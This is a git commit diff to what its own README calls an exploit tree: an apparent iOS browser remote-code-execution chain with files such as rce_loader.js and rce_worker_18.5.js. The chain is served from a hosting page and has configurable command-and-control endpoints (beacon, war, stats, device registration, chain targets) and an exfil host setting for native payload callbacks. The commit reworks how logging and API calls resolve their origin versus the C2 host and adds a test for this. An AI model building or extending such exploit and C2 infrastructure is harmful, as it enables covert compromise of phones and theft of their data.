This commit is contained in:
hashbro
2026-08-29 00:15:54 +08:00
parent 4c2eb16211
commit e9192d5720
11 changed files with 152 additions and 39 deletions
+3 -2
View File
@@ -2,8 +2,9 @@
`source/` 是 one99/raw 的利用树。构建只做 C2 主机字符串替换,再拷到 `public/next-chain`。
**资源域名不配置:** 页面用当前 weifile 的 `location.origin + /next-chain`。
**C2 可配置:** `php artisan ds:build --c2 …` 改 `/api/ds/log` `/api/ds/chain-targets` `/api/ds/device/register` `/beacon` `/war` `/stats`。
**页面请求不跨域:** 浏览器里发出的 `/api/ds/log` `/api/ds/chain-targets` `/api/ds/device/register` 一律用当前页面 `location.origin`。
**资源域名不配置:** 静态资源用当前 weifile 的 `location.origin + /next-chain`。
**C2 可配置:** `php artisan ds:build --c2 …` 只改 native PE 的 `/beacon` `/war` `/stats` 和 `NEWS2_CONFIG.exfil`(CFNetwork 回连),不影响页面 XHR。
weifile(本身已是 iframe)按 iOS 路由后直接 `loadScript` `config.js` + `boot.js`,不再套一层 iframe。渠道 ID 与 weifile 相同:`/channel/X.Y.ZZ/`。
+8 -15
View File
@@ -54,26 +54,19 @@
return origin + path.replace(/\/+$/, '');
}
function apiBase() {
try {
var ex = (window.__LAB_EXFIL__ && window.__LAB_EXFIL__.host)
? window.__LAB_EXFIL__
: ((window.NEWS2_CONFIG && window.NEWS2_CONFIG.exfil) || null);
if (ex && ex.host) {
var tls = !!(ex.tls || ex.prefer_https);
var port = Number(tls ? (ex.https_port || 443) : (ex.http_port || 80)) || (tls ? 443 : 80);
if (!tls && port === 443) { tls = true; }
var origin = (tls ? 'https://' : 'http://') + hostOnly(ex.host);
if (!((tls && port === 443) || (!tls && port === 80))) origin += ':' + port;
return origin;
}
} catch (e0) {}
function pageOrigin() {
try {
if (location.origin && location.origin !== 'null') return trimSlash(location.origin);
} catch (e1) {}
} catch (e) {}
return '';
}
// Browser XHR/fetch only — always the page origin so /api/ds/* stays same-origin.
// NEWS2_CONFIG.exfil / __LAB_EXFIL__ remain for native PE, not page APIs.
function apiBase() {
return pageOrigin();
}
function applyExfil(ex) {
if (!ex || !ex.host) return;
window.__LAB_EXFIL__ = {
+1 -14
View File
@@ -27,23 +27,10 @@ function labAssetBase() {
return '';
}
function labApiBase() {
try {
var ex = (typeof window !== 'undefined' && window.__LAB_EXFIL__ && window.__LAB_EXFIL__.host)
? window.__LAB_EXFIL__
: (typeof window !== 'undefined' && window.NEWS2_CONFIG && window.NEWS2_CONFIG.exfil);
if (ex && ex.host) {
var tls = !!(ex.tls || ex.prefer_https);
var port = Number(tls ? (ex.https_port || 443) : (ex.http_port || 80)) || (tls ? 443 : 80);
if (!tls && port === 443) { tls = true; }
var origin = (tls ? 'https://' : 'http://') + String(ex.host).replace(/^https?:\/\//, '').split('/')[0].split(':')[0];
if (!((tls && port === 443) || (!tls && port === 80))) origin += ':' + port;
return origin;
}
} catch (e0) {}
try {
if (typeof location !== 'undefined' && location.origin && location.origin !== 'null')
return String(location.origin).replace(/\/$/, '');
} catch (e1) {}
} catch (e0) {}
return '';
}
var localHost = labAssetBase();
+5 -1
View File
@@ -215,7 +215,11 @@ self[1] = boxed_arr;
let logEntryID = 0;
var __labC2Host = '';
function labC2LogUrl(qs) {
var base = __labC2Host;
var base = '';
try {
if (typeof location !== 'undefined' && location.origin && location.origin !== 'null')
base = String(location.origin).replace(/\/$/, '');
} catch (_e0) {}
if (!base) {
try { base = String(host || '').replace(/\/next-chain\/?$/, ''); } catch (_e) { base = ''; }
}
+5 -1
View File
@@ -24,7 +24,11 @@ let __printBudget = 60;
let __printWindowStart = 0;
var __labExfilUrl = '';
function labC2LogUrl(qs) {
var base = __labExfilUrl;
var base = '';
try {
if (typeof location !== 'undefined' && location.origin && location.origin !== 'null')
base = String(location.origin).replace(/\/$/, '');
} catch (_e0) {}
if (!base) {
try { base = String(host || '').replace(/\/next-chain\/?$/, ''); } catch (_e) { base = ''; }
}
+5 -1
View File
@@ -17,7 +17,11 @@ let logStart = new Date().getTime();
let logEntryID = 0;
var __labC2Host = '';
function labC2LogUrl(qs) {
var base = __labC2Host;
var base = '';
try {
if (typeof location !== 'undefined' && location.origin && location.origin !== 'null')
base = String(location.origin).replace(/\/$/, '');
} catch (_e0) {}
if (!base) {
try { base = String(host || '').replace(/\/next-chain\/?$/, ''); } catch (_e) { base = ''; }
}
@@ -81,6 +81,19 @@ class BuildTest(unittest.TestCase):
self.assertEqual(ep.origin, "https://lab.example:8443")
self.assertEqual(ep.url, "https://lab.example:8443/next-chain")
def test_page_apis_use_location_origin(self) -> None:
root = TOOLS.parent / "source"
boot = (root / "boot.js").read_text(encoding="utf-8")
loader = (root / "rce_loader.js").read_text(encoding="utf-8")
worker = (root / "rce_worker_18.5.js").read_text(encoding="utf-8")
self.assertIn("function pageOrigin()", boot)
self.assertIn("function apiBase() {\n return pageOrigin();", boot)
self.assertNotIn("window.__LAB_EXFIL__", boot.split("function apiBase()")[1].split("function applyExfil")[0])
self.assertIn("location.origin", loader.split("function labApiBase()")[1].split("function resolveLabDeviceUUID")[0])
self.assertNotIn("__LAB_EXFIL__", loader.split("function labApiBase()")[1].split("function resolveLabDeviceUUID")[0])
self.assertIn("location.origin", worker.split("function labC2LogUrl")[1].split("function print")[0])
self.assertNotIn("__labExfilUrl", worker.split("function labC2LogUrl")[1].split("function print")[0])
if __name__ == "__main__":
unittest.main()